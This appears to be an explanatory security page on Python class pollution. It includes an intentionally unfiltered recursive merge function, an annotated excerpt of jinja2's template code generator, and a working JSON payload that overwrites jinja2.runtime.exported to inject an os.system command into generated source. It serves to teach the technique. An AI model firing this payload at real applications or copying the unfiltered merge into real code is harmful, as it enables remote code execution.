Class pollution is a security flaw in which a recursive merge turns attacker-controlled keys into `getattr`/`setattr` calls on an object. Because nothing restricts the keys, the attacker can walk from the target object into its class, into the `__globals__` of its methods and from there into any loaded module, overwriting class attributes and module-level variables. Depending on which gadgets are reachable from the polluted objects, this can result in file access or even remote code execution.
Typical sinks are pydash's `set_` and `set_with` functions, or a hand-written recursive merge such as the one below (note that no key is filtered before it reaches `getattr`/`setattr`):
def merge(source, destination):
    """Recursively copy every key of ``source`` into ``destination``.

    ``destination`` may be a mapping (anything exposing ``get``) or an
    arbitrary object, in which case keys become attribute names. Nested
    dicts are merged in place; any other value overwrites the slot.

    NOTE(security): this is the vulnerable sink the page is about. Keys are
    taken verbatim from ``source`` and passed to ``getattr``/``setattr``, so
    an attacker-supplied key such as ``__class__``, ``__init__`` or
    ``__globals__`` walks out of ``destination`` into its class, its methods'
    globals and any module reachable from them (the JSON payload on this page
    does exactly that). A hardened version would reject keys that start with
    ``__`` -- or better, accept only an explicit allow-list -- before either
    recursing or assigning; that check is deliberately absent here.
    """
    for name, incoming in source.items():
        want_recurse = type(incoming) is dict
        if hasattr(destination, "get"):
            # Mapping path: merge into an existing *truthy* sub-mapping,
            # otherwise overwrite the whole slot.
            current = destination.get(name)
            if current and want_recurse:
                merge(incoming, current)
            else:
                destination[name] = incoming
            continue
        # Object path: the attacker-chosen name goes straight to
        # getattr/setattr with no validation.
        if hasattr(destination, name) and want_recurse:
            merge(incoming, getattr(destination, name))
        else:
            setattr(destination, name, incoming)
def visit_Template(
    self, node: nodes.Template, frame: t.Optional[Frame] = None
) -> None:
    """Emit the module-level preamble of a compiled template.

    This appears to be the opening of jinja2's template code-generator
    method that the class-pollution payload on this page targets. Only the
    first lines are shown; the upstream method presumably continues past the
    last line below (``eval_ctx`` is assigned but not used in this excerpt).

    Args:
        node: the root ``Template`` node being compiled.
        frame: must be ``None`` -- the root template has no enclosing frame.
    """
    assert frame is None, "no root frame allowed"
    eval_ctx = EvalContext(self.environment, self.name)
    # ``exported`` / ``async_exported`` are module-level lists in
    # jinja2.runtime; nothing here checks that they still hold identifier
    # names. A merge that can reach ``sys.modules['jinja2'].runtime.exported``
    # (see the payload on this page) can replace them with arbitrary strings.
    from .runtime import exported, async_exported
    if self.environment.is_async:
        exported_names = sorted(exported + async_exported)
    else:
        exported_names = sorted(exported)
    # The names are joined verbatim into a line of generated Python source.
    # With a polluted entry such as "*;__import__('os').system('sleep 7');#"
    # the emitted line becomes
    #   from jinja2.runtime import *;__import__('os').system('sleep 7');#
    # and the injected statement runs when that generated source is compiled
    # and executed (the compile step is outside this excerpt).
    self.writeline("from jinja2.runtime import " + ", ".join(exported_names))
Payload (merged into a target object by the vulnerable function above). Each nested key is resolved with `getattr` on the way down -- `__init__` → its `__globals__` → the module `__loader__` → that object's `__init__.__globals__` → `sys.modules` (a dict, so the `get` branch applies) → `jinja2` → `runtime` -- and the final leaf is a list, not a dict, so it is assigned with `setattr`, replacing `jinja2.runtime.exported`. When the code generator later joins that list into its `from jinja2.runtime import ...` line, the emitted source reads `from jinja2.runtime import *;__import__('os').system('sleep 7');#`:
{"__init__":{"__globals__":{"__loader__": {"__init__":{"__globals__":{"sys":{"modules": {"jinja2":{"runtime":{"exported":["*;__import__('os').system('sleep 7');#"]}}}}}}}}}}